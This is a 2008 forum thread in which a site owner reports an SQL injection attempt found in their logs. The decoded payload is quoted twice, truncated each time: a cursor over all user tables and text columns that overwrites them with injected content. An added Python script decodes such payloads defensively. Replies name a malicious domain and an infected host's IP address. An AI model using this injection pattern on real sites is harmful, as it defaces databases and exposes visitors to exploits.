lordkafei Posted August 26, 2008

I run a small niche site (nothing to do with Runescape or gaming). Tonight, while looking at my logs, I noticed someone trying to reach a strange URL:

http://[my site url was here]/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152 ...

After decoding all that hex, I got this:

    DECLARE @T varchar(255),@C varchar(4000)
    DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN
    exec('update ['+@T+'] set ['+@C+']=''">

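The log review and hex decoding described in the post above, as an added example that is not part of the original thread: it scans access-log lines for the `DECLARE @S ... CAST(0x...` shape and decodes the hex so the SQL can be read without running it. The log layout (client IP as the first field), the sample lines and all function names are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Shape of the logged request: DECLARE @var ... CAST(0x<hex digits> ...
PATTERN = re.compile(r"DECLARE\s+@\w+.*?CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.I | re.S)

def decode_hex_payload(hex_digits):
    """Decode the hex literal to text for review; it is never executed."""
    hex_digits = hex_digits[: len(hex_digits) // 2 * 2]  # drop a cut-off nibble
    raw = bytes.fromhex(hex_digits)
    # A literal cast to NVARCHAR is UTF-16LE: every second byte is 0x00.
    if len(raw) >= 4 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def scan_log(lines):
    """Return (line_number, client_ip, decoded_sql) for each matching request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = PATTERN.search(unquote(line))  # undo %20 etc. before matching
        if match:
            client_ip = line.split()[0]  # assumes the client IP is the first field
            hits.append((number, client_ip, decode_hex_payload(match.group(1))))
    return hits

# Constructed sample data: documentation-range IPs, and a payload holding only
# the first statement quoted in the post.
SAMPLE_SQL = "DECLARE @T varchar(255),@C varchar(4000)"
SAMPLE_HEX = SAMPLE_SQL.encode("ascii").hex().upper()
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Aug/2008:21:14:03 +0000] "GET /index.html HTTP/1.1" 200 5120',
    "203.0.113.7 - - [26/Aug/2008:21:14:09 +0000] \"GET /?';DECLARE%20@S%20CHAR(4000);"
    f"SET%20@S=CAST(0x{SAMPLE_HEX}%20AS%20CHAR(4000)) HTTP/1.1\" 200 404",
]

if __name__ == "__main__":
    for number, client_ip, sql in scan_log(SAMPLE_LOG):
        print(f"line {number} from {client_ip}: {sql}")
```
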
Orpheus Posted August 26, 2008

From what I can see, and the fact I'm an amateur, I'd daresay it's a keylogger, an injection attack, a tracker, or a rootkit. Try not to go to the website in the hex, I can't guarantee it's a clean link.

urbestfreind Posted August 26, 2008

http://www.siteadvisor.com/sites/douhunqn.cn

Check the comment on the bottom. ultimania92 was right on almost all counts there lol, that site (and all the ones it links to apparently) has links to browser exploits. Just google search douhunqn.cn, the results pretty much confirm what the SiteAdvisor site said.

lordkafei Posted August 27, 2008

Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64

Orpheus Posted August 27, 2008

> Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64

That would be just about right, why he didn't hide his IP though is beyond me.

Sinkhan Posted August 27, 2008

Well generally, people who are unknowingly infected and become a part of a botnet don't try to hide their IP. These people are usually the ones who don't know what botnets are and leave their computer open to them in the first place.

D. V. Devnull Posted August 28, 2008

> Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64

You're right on, lordkafei. It is a person who didn't properly protect their PC, and is currently an unknowing host to a bot on their system. Further info is at the link below...

http://network-tools.com/default.asp?prog=express&host=141.158.58.64

(Note: I don't provide bad links. It is clean, so go have a look!)

I suggest that you note the date and time of when the attack occurred, and get in touch with Verizon in Philadelphia. They will be able to put an end to this problem, forever.

~Mr. D. V. Devnull

Mainman46 Posted August 28, 2008

> DECLARE @T varchar(255),@C varchar(4000)
> DECLARE Table_Cursor CURSOR FOR
> select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
> OPEN Table_Cursor
> FETCH NEXT FROM Table_Cursor INTO @T,@C
> WHILE(@@FETCH_STATUS=0) BEGIN
> exec('update ['+@T+'] set ['+@C+']=''">